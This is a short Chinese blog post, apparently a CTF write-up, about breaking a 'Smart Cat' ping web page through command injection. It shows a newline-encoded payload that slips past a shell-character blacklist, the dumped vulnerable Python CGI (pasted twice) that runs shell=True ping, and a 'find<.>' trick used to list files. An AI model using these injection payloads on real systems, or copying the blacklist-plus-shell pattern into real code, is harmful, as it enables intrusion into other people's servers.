帮小伙伴解个题,想起博客很久没更新了,顺便写上来。
给了个网址,提示说按照正常思维去拿flag.......(瞬间吐槽2333333玩这个谁会自己按照正常思维啊...)
给出网页可以允许ping其他主机并显示结果。
这个阶段的话就相当于随便猜了,八九不离十是远程代码执行。然后开始常见注入测试,但是发现大部分都被过滤了。
还好换行符没被ban,unix中还能用作分隔符。
果然可以列出当前目录....然后就开始吐槽制作方的无脑.....(等下你就知道了)
然后发现这个页面同时支持GET/POST请求,写了个注入语句读取一下这个cgi的内容:
?dest=%0acat Python
#!/usr/bin/env python import cgi, subprocess, os headers = ["mod_cassette_is_back/0.1","format-me-i-im-famous","dirbuster.will.not.help.you","solve_me_already"] print "X-Powered-By: %s" % headers[os.getpid()%4]print "Content-type: text/html"print print """Ping results:Can I haz Smart Cat ??? Smart Cat debugging interface
""" blacklist = " $;&|({`\t"results = ""form = cgi.FieldStorage()dest = form.getvalue("dest", "127.0.0.1")for badchar in blacklist:if badchar in dest:results = "Bad character %s in dest" % badcharbreak if "%n" in dest:results = "Segmentation fault" if not results:try:results = subprocess.check_output("ping -c 1 "+dest, shell=True)except:results = "Error running " + "ping -c 1 "+dest print """
%s
""" % cgi.escape(results) #!/usr/bin/env python import cgi, subprocess, os headers = ["mod_cassette_is_back/0.1","format-me-i-im-famous","dirbuster.will.not.help.you","solve_me_already"] print "X-Powered-By: %s" % headers[os.getpid()%4]print "Content-type: text/html"print print """Ping results:Can I haz Smart Cat ??? Smart Cat debugging interface
""" blacklist = " $;&|({`\t"results = ""form = cgi.FieldStorage()dest = form.getvalue("dest", "127.0.0.1")for badcharin blacklist:if badcharin dest:results = "Bad character %s in dest" % badcharbreak if "%n" in dest:results = "Segmentation fault" if not results:try:results = subprocess.check_output("ping -c 1 "+dest, shell=True)except:results = "Error running " + "ping -c 1 "+dest print """
%s
""" % cgi.escape(results) 好吧原来是个python脚本....
然后发现了不能ls -R的原因,因为TAB和空格被过滤了....
不过又没人说不能用别的办法啊,于是想到某个forum里的大神提到的新方法: find<.>
制作商你满满的心机啊.......诅咒你....
然后复制粘贴,拿到flag文件,尼玛为毛是个猫.......233333333333还有这个flag是什么鬼啊